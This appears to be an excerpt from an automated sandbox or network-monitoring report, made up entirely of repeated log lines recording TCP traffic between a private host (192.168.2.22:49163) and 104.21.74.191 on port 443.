Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
